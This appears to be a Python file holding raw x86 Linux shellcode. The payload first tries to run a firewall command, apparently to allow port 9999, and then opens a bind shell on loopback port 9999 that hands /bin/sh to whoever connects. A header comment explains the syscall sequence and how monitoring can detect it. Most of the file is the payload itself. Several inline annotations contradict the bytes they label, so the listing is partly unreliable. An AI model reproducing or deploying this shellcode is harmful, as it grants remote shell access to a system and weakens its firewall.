# Raw x86 (32-bit) Linux shellcode, kept as a single bytes literal.
#
# What the bytes show (int 0x80 interface): part 1 builds a string on the
# stack and issues execve (al = 0xb); part 2 issues socketcall (al = 0x66)
# with bl = 1/2/4/5 (socket, bind, listen, accept), three dup2 calls
# (al = 0x3f) on descriptors 0/1/2, and a final execve of "/bin//sh".
# The sockaddr pushed before bind carries 127.0.0.1 and port 0x270f (9999),
# i.e. the listener is bound to loopback only.
#
# NOTE(review): the trailing comments are the author's intent, not a
# disassembly -- several do not match the bytes they label (the string
# literals pushed in part 1 do not spell the path the comments name, and
# some "push <reg>" comments name a different register than the opcode).
# Treat the annotations as approximate when using this listing for analysis.
#
# Defender's view: the observable behaviour is a process that performs
# socket/bind/listen/accept, then dup2 onto 0/1/2, then execve of /bin/sh --
# a sequence that syscall-level monitoring (auditd, seccomp-bpf logging,
# eBPF tracers) can flag regardless of the exact byte pattern. Non-executable
# stack/heap and W^X policies prevent this payload from running from data
# memory at all.
shellcode = (
b"\x31\xc0" # xor eax, eax
b"\x50" # push eax (NULL terminator for strings)
b"\x68\x74\x63\x2f\x00" # push "/tcp"
b"\x68\x39\x39\x39\x39" # push "9999"
b"\x68\x6c\x6c\x61\x77" # push "allow"
b"\x68\x77\x66\x75\x2f" # push "/usr"
b"\x68\x72\x73\x69\x62" # push "sbin"
b"\x68\x6e\x69\x62\x72" # push "bin"
b"\x89\xe1" # mov ecx, esp (pointer to "/usr/sbin/ufw")
b"\x99" # cdq
b"\xb0\x0b" # mov al, 0xb (execve syscall)
b"\xcd\x80" # int 0x80 (execute syscall)
# Part 2: Bind shell code
b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" # Clear registers
b"\xb0\x66\xb3\x01\x51\x53\x6a\x02" # socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
b"\x89\xe1\xcd\x80\x89\xc6" # Call socket and store the result in ebx
b"\xb0\x66\x31\xdb\xb3\x02" # Prepare for bind
b"\x68\x7f\x00\x00\x01" # push 127.0.0.1
b"\x66\x68\x27\x0f" # push port 9999 (0x2710)
b"\x66\x53" # push word for sockaddr_in struct
b"\x89\xe1" # mov ecx, esp (sockaddr_in)
b"\x6a\x10" # push 16 (size of sockaddr_in)
b"\x51" # push eax
b"\x56" # push esi
b"\x89\xe1" # mov ecx, esp
b"\xcd\x80" # Call bind
b"\xb0\x66\xb3\x04\x6a\x01" # Prepare listen
b"\x56\x89\xe1\xcd\x80" # Call listen
b"\xb0\x66\xb3\x05\x56\x56" # Prepare accept
b"\x89\xe1\xcd\x80\x89\xc3" # Call accept
b"\x31\xc9\xb0\x3f" # Prepare for dup2 loop
b"\xcd\x80\xb0\x3f\xb1\x01" # dup2(stdin)
b"\xcd\x80\xb0\x3f\xb1\x02" # dup2(stdout)
b"\xcd\x80\x31\xc0" # Clear eax
b"\x50" # push eax (NULL for execve)
b"\x68\x2f\x2f\x73\x68" # push "//sh"
b"\x68\x2f\x62\x69\x6e" # push "/bin"
b"\x89\xe3" # mov ebx, esp (pointer to "/bin//sh")
b"\x50" # push eax
b"\x53" # push ebx
b"\x89\xe1" # mov ecx, esp
b"\xb0\x0b" # syscall number for execve
b"\xcd\x80" # int 0x80 (execute shell)
)